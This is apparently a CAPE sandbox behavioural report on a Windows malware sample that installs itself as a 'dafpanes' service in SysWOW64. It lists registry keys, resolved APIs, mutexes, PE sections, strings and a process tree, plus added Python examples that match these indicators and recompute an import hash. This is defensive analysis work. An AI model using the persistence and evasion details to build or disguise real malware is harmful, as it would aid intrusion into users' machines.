HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dafpanes\Environment
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\dafpanes_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings

Resolved APIs

kernel32.dll.VirtualAlloc
kernel32.dll.LoadLibraryA
kernel32.dll.GetProcAddress
kernel32.dll.VirtualProtect
kernel32.dll.FreeConsole
kernel32.dll.lstrlenA
kernel32.dll.lstrcmpA
kernel32.dll.GetLastError
kernel32.dll.SetLastError
kernel32.dll.GetCurrentProcessId
kernel32.dll.GetCurrentProcess
user32.dll.wsprintfA
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
oleaut32.dll.#200
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
comctl32.dll.#385
comctl32.dll.#320
comctl32.dll.#324
comctl32.dll.#323
ole32.dll.CreateBindCtx
ole32.dll.CoTaskMemAlloc
ole32.dll.CoGetApartmentType
ole32.dll.CoRegisterInitializeSpy
ole32.dll.CoTaskMemFree
comctl32.dll.#236
oleaut32.dll.#6
ole32.dll.CoGetMalloc
comctl32.dll.#328
comctl32.dll.#334
oleaut32.dll.#2
ole32.dll.CoCreateInstance
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
setupapi.dll.CM_Get_Device_Interface_List_ExW
comctl32.dll.#332
comctl32.dll.#386
advapi32.dll.InitializeSecurityDescriptor
advapi32.dll.SetEntriesInAclW
ntmarta.dll.GetMartaExtensionInterface
advapi32.dll.SetSecurityDescriptorDacl
advapi32.dll.IsTextUnicode
comctl32.dll.#338
comctl32.dll.#339
shell32.dll.#102
advapi32.dll.OpenThreadToken
propsys.dll.PSLookupPropertyHandlerCLSID
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryValueExW
advapi32.dll.RegCloseKey
propsys.dll.PSCreatePropertyStoreFromObject
propsys.dll.#417
propsys.dll.PropVariantToStringAlloc
ole32.dll.PropVariantClear
propsys.dll.PSCreateMemoryPropertyStore
propsys.dll.PropVariantToBuffer
propsys.dll.PropVariantToUInt64
propsys.dll.PropVariantToBoolean
propsys.dll.InitPropVariantFromBuffer
advapi32.dll.GetNamedSecurityInfoW
advapi32.dll.TreeSetNamedSecurityInfoW
ole32.dll.CoUninitialize
comctl32.dll.#329
comctl32.dll.#388
comctl32.dll.#321
ole32.dll.CoRevokeInitializeSpy
oleaut32.dll.#500
comctl32.dll.#387
comctl32.dll.#327
advapi32.dll.UnregisterTraceGuids
cryptsp.dll.CryptReleaseContext
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptGenKey
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptDuplicateHash
cryptsp.dll.CryptEncrypt
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
iphlpapi.dll.GetAdaptersAddresses
dhcpcsvc.dll.DhcpRequestParams
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptVerifySignatureW

Executed Commands

"C:\Windows\SysWOW64\dafpanes.exe"

Mutexes

PEM9B0
PEMB74
Global\IA4889F95
Global\MA4889F95
PEM1CC
PEMAB0
IESQMMUTEX_0_208

Created Services

dafpanes

Started Services

dafpanes
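The behavioural artifacts listed on this page (a service named dafpanes whose keys under services\dafpanes were read, the process launched from C:\Windows\SysWOW64\dafpanes.exe, and the mutex names PEM&lt;hex&gt;, Global\I&lt;hex&gt; and Global\M&lt;hex&gt; sharing one hex suffix) are the kind of thing a host sweep can match on. The Python below is an added example, not CAPE's code or anything taken from the sample; it runs the checks over the names from this report plus a few constructed entries (the benign service lines and the unpaired Global\IDEADBEEF) so that both positive and negative cases are exercised. The regex shapes are taken from the names shown here, and the scoring weights are the example's own.

```python
import re
from collections import defaultdict

# Mutex names from the report's mutex list, plus one constructed name
# (Global\IDEADBEEF) to show an I-name with no matching M-name.
MUTEXES = [
    "PEM9B0", "PEMB74", "Global\\IA4889F95", "Global\\MA4889F95",
    "PEM1CC", "PEMAB0", "IESQMMUTEX_0_208",
    "Global\\IDEADBEEF",
]

# Service name and ImagePath: the dafpanes entry matches what the report
# shows (service keys read, process launched from SysWOW64); the other two
# are constructed benign entries for contrast.
SERVICES = [
    ("dafpanes", r"C:\Windows\SysWOW64\dafpanes.exe"),
    ("wuauserv", r"C:\Windows\system32\svchost.exe -k netsvcs"),
    ("VBoxService", r"C:\Windows\System32\VBoxService.exe"),
]

# Name shapes seen on the page: Global\I<8 hex> paired with Global\M<same hex>,
# and PEM<hex>. The hex lengths are taken from the observed names.
GLOBAL_IM = re.compile(r"^Global\\([IM])([0-9A-F]{8})$")
PEM = re.compile(r"^PEM[0-9A-F]{3,8}$")
# A bare executable directly under SysWOW64 (optionally quoted), no arguments.
SYSWOW64_EXE = re.compile(r'^"?[A-Za-z]:\\Windows\\SysWOW64\\([^\\"]+)\.exe"?$',
                          re.IGNORECASE)


def classify_mutexes(names):
    """Group mutex names into PEM-style names, I/M pairs sharing a suffix, and
    unpaired I or M names. Anything else (e.g. IESQMMUTEX_0_208, a normal
    Internet Explorer mutex) is ignored."""
    hits = {"pem": [], "im_pairs": [], "im_unpaired": []}
    by_suffix = defaultdict(set)
    for name in names:
        if PEM.match(name):
            hits["pem"].append(name)
            continue
        m = GLOBAL_IM.match(name)
        if m:
            by_suffix[m.group(2)].add(m.group(1))
    for suffix, kinds in by_suffix.items():
        key = "im_pairs" if kinds == {"I", "M"} else "im_unpaired"
        hits[key].append(suffix)
    return hits


def suspicious_services(services):
    """Flag services whose ImagePath is a lone executable in SysWOW64 whose
    file name equals the service name. Built-in Windows services run from
    System32 (usually via svchost.exe); third-party ones rarely drop a
    same-named binary directly into SysWOW64."""
    flagged = []
    for name, image in services:
        m = SYSWOW64_EXE.match(image)
        if m and m.group(1).lower() == name.lower():
            flagged.append(name)
    return flagged


def triage(mutexes, services):
    """Combine both signals into one record; weights are the example's own."""
    m = classify_mutexes(mutexes)
    s = suspicious_services(services)
    score = len(m["pem"]) + 2 * len(m["im_pairs"]) + 2 * len(s)
    return {"score": score, "mutexes": m, "services": s}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(MUTEXES, SERVICES), indent=2))
```

On a live host the mutex list would come from a handle enumeration and the service list from HKLM\SYSTEM\CurrentControlSet\Services. The Tracing\dafpanes_RASAPI32 and dafpanes_RASMANCS keys in the registry list are not an extra indicator in themselves: Windows reads and creates Tracing\&lt;process name&gt;_RASAPI32 for any process that loads rasapi32.dll, so they only echo the process name; the service ImagePath and the paired I/M mutexes are the artifacts worth matching.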

PE Information

Image Base 0x00400000
Entry Point 0x00412ebe
Reported Checksum 0x00000000
Actual Checksum 0x0007d35b
Minimum OS Version 5.0
Compile Time 2019-02-11 13:22:23
Import Hash 2c39de476028b5f0ff38b49f8680c279

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x0001357a 0x00013600 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 3.63
.data 0x00015000 0x00005a28 0x00003c00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 2.89
.idata 0x0001b000 0x0005a386 0x0005a400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.60
.rsrc 0x00076000 0x000004b0 0x00000600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 2.81
.reloc 0x00077000 0x00000d0c 0x00000e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 5.84

Imports

Library OLEAUT32.dll:
0x41b020 VarCyMulI8
Library ADVAPI32.dll:
Library KERNEL32.dll:
0x41b008 GetCalendarInfoEx
0x41b00c GetModuleHandleW
Library USER32.dll:
0x41b038 DdeDisconnectList
0x41b03c GetCursorInfo
0x41b040 TrackPopupMenu
Library SHLWAPI.dll:
0x41b028 StrChrNW
Library msvcrt.dll:
0x41b050 memset
0x41b054 towupper
Library Secur32.dll:
Library WININET.dll:
0x41b048 InternetAutodial
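As an added example (not part of the CAPE report and not code from the sample), the Python below recomputes an import hash over the import table listed above using the same normalisation pefile applies, and runs a few static checks over the header and section values shown. The listing above is partial (ADVAPI32.dll and Secur32.dll show no entries), so the recomputed hash will not equal the page's 2c39de476028b5f0ff38b49f8680c279; the point is the method. The thresholds (an .idata raw size more than four times .text, a compile time within 24 hours of first sighting) and the FIRST_SEEN value are the example's own assumptions.

```python
import hashlib
from datetime import datetime, timedelta

# Import table as listed in the report's "Imports" section, order preserved.
# Libraries with no listed entries contribute nothing to the hash.
IMPORTS = [
    ("OLEAUT32.dll", ["VarCyMulI8"]),
    ("ADVAPI32.dll", []),
    ("KERNEL32.dll", ["GetCalendarInfoEx", "GetModuleHandleW"]),
    ("USER32.dll", ["DdeDisconnectList", "GetCursorInfo", "TrackPopupMenu"]),
    ("SHLWAPI.dll", ["StrChrNW"]),
    ("msvcrt.dll", ["memset", "towupper"]),
    ("Secur32.dll", []),
    ("WININET.dll", ["InternetAutodial"]),
]

# Section table from the report: name, virtual size, size of raw data, entropy.
SECTIONS = [
    (".text", 0x1357A, 0x13600, 3.63),
    (".data", 0x5A28, 0x3C00, 2.89),
    (".idata", 0x5A386, 0x5A400, 5.60),
    (".rsrc", 0x4B0, 0x600, 2.81),
    (".reloc", 0xD0C, 0xE00, 5.84),
]

REPORTED_CHECKSUM = 0x00000000
ACTUAL_CHECKSUM = 0x0007D35B
COMPILE_TIME = datetime(2019, 2, 11, 13, 22, 23)
# Constructed reference time for the stand-alone run: when the sample was
# first seen. A real pipeline would pass the submission timestamp here.
FIRST_SEEN = datetime(2019, 2, 11, 20, 0, 0)


def imphash_string(imports):
    """Build the string pefile hashes: lower-cased 'lib.func' pairs joined by
    commas, with a .dll/.ocx/.sys extension stripped from the library name.
    Imports by ordinal would need pefile's ordinal-to-name tables; none occur
    in this table, so they are not handled here."""
    parts = []
    for lib, funcs in imports:
        lib = lib.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if lib.endswith(ext):
                lib = lib[: -len(ext)]
                break
        parts.extend(f"{lib}.{func.lower()}" for func in funcs)
    return ",".join(parts)


def imphash(imports):
    """MD5 of the normalised import string, as pefile's get_imphash() does."""
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


def static_flags(sections, reported, actual, compiled, first_seen):
    """Cheap header/section checks over values the report already shows.
    Thresholds are the example's own: an import section whose raw size is
    more than four times the code section, and a compile time within 24 hours
    of first sighting, are both unusual for legitimately built software."""
    flags = []
    if reported == 0:
        flags.append("checksum-unset")
    elif reported != actual:
        flags.append("checksum-mismatch")
    raw = {name: rsize for name, _vsize, rsize, _ent in sections}
    if ".text" in raw and ".idata" in raw and raw[".idata"] > 4 * raw[".text"]:
        flags.append("idata-larger-than-code")
    for name, _vsize, _rsize, entropy in sections:
        if entropy > 7.0:
            flags.append(f"high-entropy:{name}")
    if abs(first_seen - compiled) < timedelta(hours=24):
        flags.append("compiled-within-24h-of-first-sighting")
    return flags


if __name__ == "__main__":
    print("imphash over listed imports:", imphash(IMPORTS))
    print("flags:", static_flags(SECTIONS, REPORTED_CHECKSUM, ACTUAL_CHECKSUM,
                                 COMPILE_TIME, FIRST_SEEN))
```

Two caveats on reading the flags. A zero CheckSum field is common for user-mode binaries built without /RELEASE, so "checksum-unset" alone is weak; it matters mostly as a deviation from what a given vendor normally ships. The .idata size is the stronger oddity here: an import directory for ten named imports needs a few hundred bytes, not 0x5a400, so something other than import descriptors fills that section, and the section entropy (5.60) says it is not high-entropy packed data either.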

Strings

.text
`.data
.idata
@.rsrc
@.reloc
_M=PE
m_p=@
6Z7 $)
z037[
Q G/4
OLEAUT32.dll
GetSidSubAuthorityCount
ADVAPI32.dll
GetModuleHandleW
Wow64SetThreadContext
IsSystemResumeAutomatic
GetCalendarInfoEx
GetLargestConsoleWindowSize
KERNEL32.dll
TrackPopupMenu
GetCursorInfo
DdeDisconnectList
USER32.dll
StrChrNW
SHLWAPI.dll
memset
towupper
msvcrt.dll
InitializeSecurityContextW
Secur32.dll
InternetAutodial
WININET.dll
:L=X=
4"5(5.545:5@5F5L5R5X5^5d5j5p5v5
9,:0:4:
(The remaining extracted strings, some 530 lines, are two families of non-text byte runs with no readable content: short sequences over the characters e, t, w, # and $ such as "$weww#w$wt$", and long repeats of "!125345232!" / "1125345232!".)
!125345232!12534523211253452321125345232!125345232!
!1253452321125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!1253452321125345232!
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!1253452321125345232!1253452321125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!12534523211253452321
!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!1253452321125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!
#eeet#$e#$eewe
ete$etwteet#$w
tt$#ew$
$$ttee#ee
#w##we$we$t
$e$#ee#e$ttt
tee#e$ee
t$w$te#te
ett$#e#eetwww
$tt#e
eeewee
$t$eet#eeet#e
we$$wee##ee$
$$wteet$t$
t#$#$tewt$e$tw#$
ttttt$eee$$#tt
#$t$#t$teeet
eteet#teett
#tee$ttew$
$$$$ewte#$wt
!125345232!125345232!125345232!125345232!125345232!1253452321125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!1253452321
!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!125345232!1253452321125345232!125345232!1253452321125345232!125345232!125345232!
!12534523211253452321125345232!125345232!
$#teewe#w
tetweett
ett#twt#$t$tte
e#tt#
$ewwteee$etewe#$
#w###ttttte
tt$tt$#$ewet$
#et#tewt#$$tet
eeeee$wwetee#
w#$tttte
#e#ttew
#eww$#e
wt$wttw$ewtttt
etttte$
e$ttwte$
ete#e$$#e
et#wt
ttw#et
$t$tt$
$eewt$teeet$w#$t
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!1253452321125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!1253452321125345232!1253452321125345232!125345232!
!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
!1253452321125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
!125345232!1253452321
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!
ew#et##ttt
#e#wewe#eeww
tewetteww$ewe$e
weeeteewe#$
#t#eetw#ttt
eeteetwttwe
#t$ttte#w#e#
$ttete#t$ee##ttw
w$e$te#$$wt#
#$et#tewe
$tew$$w#tee
e$t$e
ewettt$e
w#$$w#etttw#et$
t#t$e
e#eete$w$
et$$t$t$wtte$wt
ttete$ee#$$w$#et
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
11253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
$wet$##we
$#w#ewwteew$te$
#e$#w
w#ett
$##eee$wtw#w##te
te#$wttwt#wet$#
t$$tt$eweteeetew
e###$t$#$$#$eet
wete$e#$wtee
#$w#ttwe
eeeett##$et$ee
t#ee#$tt
#e#eteet#wewtw
tt##ttt
#eet##w$t#
teweeett#wtttet$
$ttette#etet
#w$eettteeet##
tee$ew$#tw#
!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!12534523211253452321
!1253452321125345232!1253452321
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
tt#$wwteete$w
eeetteewt$$
wteeet#e#we
$eewtwe#e#t
tewet#et$et#t
ewe#etwte
t#ew$ttw
twe#eet
teetwee$ttee##ew
weee#t#ttteeet
##$e$$wtetwe$
e#w$e$we$e
#twte
$#$$$e#tte
ew$tt#$#e$t
#$##ewtete$
1125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!12534523211253452321125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!1253452321125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!
$ttwtteete#ewt
teete
tee$$wtwe#
##e##e#et
teteet$t
#t#etw$et####
w#w#e$##eeee
$$$eetwe#tewe
eweetweetwwe
t$eeeet$$ee
tet$etttw
ewewt
ttweew#t$$wtt$
#$teeww#etwwe
e$ttet#$twtew##
#$$wtwwwwww#t$
$$tee
tteetew#tttt
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!1253452321125345232!125345232!125345232!
1125345232!125345232!1253452321125345232!1253452321125345232!125345232!
$wwet$ewwttw
eetwte$$e
t$tteeete$e
$wtt$#$et#e
#wtet
t$$t#e$ee##t#$t#
$ewtt
e#t#t#wtete#
w$wt$
w###we#tw$te$#
eett#t$ee#t$
tteet
eewtt$t
te#e#eete
e###eeette$e$w
e$etww
#w#ww#wtte
$ww$ttwwe
e#eet$t
1125345232!1253452321125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
!125345232!125345232!12534523211253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!1253452321125345232!1253452321
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
!125345232!12534523211253452321125345232!125345232!125345232!125345232!
eewteww#ett##
wttt$#
#tet$
teet$e$ttt
e#eeeete$t$t#
ee$$$#twe$#wtw$t
w#ew##t
$t#t##e##eetew
tteeet
#ttt$
tttetew
weeeete#t
eet$#te$#$ee$e#
#wete#e#tttee#
t$$e$te#tt#
w$#$ewett
ewtet$##tew#tew
$tetee$wt#
wt#$$e#$tee#$t#e
#$$#eew$e$$t$
$w$$ee$e#w
!1253452321125345232!1253452321125345232!
!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
$#ew$teeeeette
wew#tewwtet#
tw#t$$
$teetetww$wtttw#
twetw$ttt#et
wtt$te$ett
eee$weeteweetete
ewew#tt$#wee
e$$t#w
e$wtee
#t##e#t
ewt$#$$e
t$ee$#eteewe
#e$$#w#ttetwe$$
twe$eet#
tttteetw#ttte$$e
w$tett#e#et$$et
$ett#$$ewwtt
t#wee#wttt
$ew$$#e
1125345232!125345232!1253452321125345232!125345232!125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!1253452321125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!
1125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!12534523211253452321125345232!1253452321125345232!
!12534523211253452321
!125345232!1253452321125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
wt#e##$e#e$tw
e#$#tetewwtte$
w$tw$e#
#$t$eetwtwwte#$
tet$e$etwet
#e$$wtwe
ee#wtt#te#t
eweettttw#e
#ttw$t$ttwt$ete
##ttteettet$t$e#
$et##e$etw$
wwteee$#
tt$eeeweeww
eete#
wettet$t
tt#$ee
w#$ttette
!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!1253452321125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!
!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
$e#te#$t$etewetw
t$etet$t
w$t###wttet
e$wwtw
$e#$$ette$$
ettett
wt$tw$etwewwt
#we#twewte#t
wteette$ete
twe#t#t#
#twtw$$
#tteet#ewt$tttte
e#ew##tw#$ettw
#wett
te#t$e#e$ww$#t
t#tw$eee$$$#$##w
t$$tww$tte$wet##
ttwewtet$ew
e##$te#$et$eeetw
1125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!1253452321125345232!
ttet#teet
wwwweet$wt
#eeeww#
t$w$t
$$wettew
ewt$#et
teet$
t#ee$e#ww$t
wtttt$tet#$#
ew#ett$e$ew#te
#tww$#eee##t#ew
ew#e#e$t
twwee$ee#
wettet
t#$tt#$$tteeteee
ttw$tte#$twwe
ee#ww#tt
ewe$$e
!125345232!125345232!125345232!125345232!125345232!125345232!12534523211253452321
!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!
$w$#ttet
tttet
etwteeeeetwet$e#
$et$t
eee$tettw
$twe#ete
wte#etw##$e$e$w#
#e$#$#$eet$
e#wetw#te#
tete$t
wewttette
te##$we$
tetewtte$etwww$
t#t$e$t
tt$#e#tew#tte$#e
ewtett$t$weeet
tw$e#
!125345232!125345232!125345232!125345232!1253452321125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!1253452321125345232!125345232!125345232!1253452321125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!
!125345232!125345232!125345232!125345232!125345232!1253452321125345232!125345232!
1125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!125345232!1253452321
7stgA5jGRH#
J@#YHW
WJWEJKME#@WH
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040904E4
CompanyName
Microsoft Corporatio
FileDescription
United Kingdom Extended Keybo
FileVersion
6.1.7600.16385
InternalName
kbdukx (3.
LegalCopyright
Microsoft Corporation. All righ
-1998
LegalTrademarks
Microsoft(R) is a registered trademark of Microsoft Corporation. Windows(TM) is a trademark of Microsoft Corporation
ProductName
Operating Syst
oordinator
ProductVersion
6.1.7600.163
This file is not on VirusTotal.

Process Tree


sPVjc.exe, PID: 2932, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\sPVjc.exe
Command Line: "C:\Users\user\AppData\Local\Temp\sPVjc.exe"
sPVjc.exe, PID: 2832, Parent PID: 2932
Full Path: C:\Users\user\AppData\Local\Temp\sPVjc.exe
Command Line: "C:\Users\user\AppData\Local\Temp\sPVjc.exe"
services.exe, PID: 460, Parent PID: 372
Full Path: C:\Windows\sysnative\services.exe
Command Line: C:\Windows\system32\services.exe
dafpanes.exe, PID: 2736, Parent PID: 460
Full Path: C:\Windows\SysWOW64\dafpanes.exe
Command Line: "C:\Windows\SysWOW64\dafpanes.exe"
dafpanes.exe, PID: 2224, Parent PID: 2736
Full Path: C:\Windows\SysWOW64\dafpanes.exe
Command Line: "C:\Windows\SysWOW64\dafpanes.exe"

Hosts

Direct   IP               Country Name
